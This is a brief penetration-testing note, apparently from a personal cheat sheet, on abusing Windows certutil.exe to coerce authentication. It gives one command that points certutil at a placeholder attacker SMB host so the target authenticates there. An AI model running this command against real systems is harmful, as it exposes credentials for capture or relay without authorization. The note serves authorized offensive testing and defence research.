# certutil

## Coerce authentication
In this [tale of pentest pwnage](https://7minsec.com/blog/2024/07/12/7ms-632-tales-of-pentest-pwnage-part-59/) I used `certutil.exe` to coerce authentication to my attacking system:

```
certutil -syncwithWU \\your.kali.ip.address\arbitrary-folder
```
